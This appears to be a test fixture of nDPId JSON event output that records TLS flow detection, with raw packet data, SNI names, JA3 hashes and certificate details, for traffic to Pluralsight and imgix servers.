+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1648373357861,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357861,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA85z1AAEAGwDrAqAGAkks+0KcmAbuYBq2TAAAAAKAC+vBS8wAAAgQFtAQCCAquLcouAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1648373357870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357870,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7px6MpPZof\/N03qAS\/\/\/QggAAAgQFTAQCCApC6QiXri3KKAEDAwk="} +01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1648373357870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357870,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5tRdAAEAG8GPAqAGAkks+0KceAbt\/83TejKT2aYAYAfY+HwAAAQEICq4tyjdC6QiXFgMBAgABAAH8AwNByQDZoxI4dOK0Sqz8YqFtpt\/EgjJNogy+qC4qHtET5yBBjqjV\/zD\/ZZYcaXw3kK2L11Av5ASkLtB9CBYWZu3HRgAg2toTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTGhoAAAAAABsAGQAAFnBsdXJhbHNpZ2h0Mi5pbWdpeC5uZXQAFwAA\/wEAAQAACgAKAAh6egAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKXp6AAEAAB0AICyryrnXcbLoAjfLxc89+emszCPBlJNQz9WtPrwFSKZoAC0AAgEBACsABwZ6egMEAwMAGwADAgACRGkABQADAmgySkoAAQAAFQDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357854,"flow_last_seen":1648373357870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357870,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1648373357879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357879,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7pyYtR\/VLmAatlKAS\/\/8fEgAAAgQFTAQCCAr1hBcPri3KLgEDAwk="} +01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1648373357879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI55z9AAEAGvjvAqAGAkks+0KcmAbuYBq2ULUf1TIAYAfb0QgAAAQEICq4tykD1hBcPFgMBAgABAAH8AwMVCkjcl1ldHYszMMhbvCrBmyAv89Ky2j4DTP7XcUyMOSBZfmcNBQmySrBYu\/Xc6jDaJEswZCfnt+SXnGDnGRc5VwAgCgoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABoAGAAAFXBsdXJhbHNpZ2h0LmltZ2l4Lm5ldAAXAAD\/AQABAAAKAAoACBoaAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApGhoAAQAAHQAgibFRT+4ffFiWVzdt9+CHYgJvYueRYWReY4H44PP66lMALQACAQEAKwAHBurqAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAMIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357861,"flow_last_seen":1648373357879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373358908,"flow_last_seen":1648373358908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373358908,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1648373358908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358908,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPxAAEAG95PAqAGAEsvJOKZ6AbsXjcxKAAAAAKAC+vDGJwAAAgQFtAQCCAq7LqF\/AAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1648373358948,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358948,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOUG948Sy8k4wKgBgAG7pnpgCgHJF43MS6ASaN+FjQAAAgQFtAQCCAqVXttnuy6hfwEDAwg="} +01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1648373358949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373358949,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pP5AAEAG9ZTAqAGAEsvJOKZ6AbsXjcxLYAoByoAYAfahVQAAAQEICrsuoaiVXttnFgMBAgABAAH8AwPQaIxCQafGfU7U68BjTWz12bgC7rPMRDrwBcYKkg2BtiCsXEdEYhfEEMAlvDmVmL\/9\/3dvAf\/ZUZkvazPc8sBEAwAg6uoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAABgAFgAAE3N0dC5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAhaWgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKVpaAAEAAB0AIC1NIbYz00S\/PDWD2znXWT+4vqGbUzfdyPQt1wB6uPFJAC0AAgEBACsABwb6+gMEAwMAGwADAgACRGkABQADAmgyuroAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373358908,"flow_last_seen":1648373358949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373358949,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373358908,"flow_last_seen":1648373358988,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373358988,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01250{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373358908,"flow_last_seen":1648373358992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4861,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1648373358992,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","server_names":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, CN=stt.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C5:A3:DE:6D:71:B1:15:77:EC:86:38:E6:30:1C:F5:AC:18:9D:BE:82"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359576,"flow_last_seen":1648373359576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359576,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1648373359576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359576,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TutAAEAGHxbAqAGAaBOif780Abvdb02GAAAAAKAC+vDHywAAAgQFtAQCCArb1PDNAAAAAAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1648373359597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359597,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGdQloE6J\/wKgBgAG7vzSUVFy03W9Nh4AS\/\/\/FjwAAAgQFeAEBBAIBAwMK"} +01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1648373359600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359600,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItTu1AAEAGHSPAqAGAaBOif780Abvdb02HlFRctVAYAfYwgAAAFgMBAgABAAH8AwOIgQTFWwPXqiGWcEl1+ZXYiujgmOb6nQAZYCe\/QQpLyiA8RROCb85LShovAJOvtUQPlP7tKhROlf321DTdV6NmHgAgysoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGT2toAAAAAABgAFgAAE3d3dy5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAgKCgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKQoKAAEAAB0AIEbEu4abSNoKA92bDrKiGkIvMOu6w9kvXP7U129h\/FVaAC0AAgEBACsABwaamgMEAwMAGwADAgACRGkABQADAmgyGhoAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359576,"flow_last_seen":1648373359600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359600,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":40,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359621,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359646,"flow_last_seen":1648373359646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359646,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1648373359646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359646,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8yIlAAEAGdgjAqAGAaBHR8K7iAbvIMdGjAAAAAKAC+vD8DgAAAgQFtAQCCArhZSj9AAAAAAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1648373359662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359662,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGRZpoEdHwwKgBgAG7ruI30m4VyDHRpIAS\/\/+CtAAAAgQFeAEBBAIBAwMK"} +01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1648373359662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItyItAAEAGdBXAqAGAaBHR8K7iAbvIMdGkN9JuFlAYAfapQAAAFgMBAgABAAH8AwNnKyM21\/SbS3Q02cIKvbAgcmV67HQB0KXsoOxxl9v++yDRdtN3P07Qel84K9CWVDBxLwdJHbn9d9oomO2+9M0CRgAgenoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAAD4APAAAOXpuNnF6cTZjYWF1Y3VkZXNyLXBsdXJhbHNpZ2h0LnNpdGVpbnRlcmNlcHQucXVhbHRyaWNzLmNvbQAXAAD\/AQABAAAKAAoACLq6AB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApuroAAQAAHQAgm5zCzvNJzsWd1VyD4DXwZiQmlSanX10JAobLY4rSfTUALQACAQEAKwAHBsrKAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAJ4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 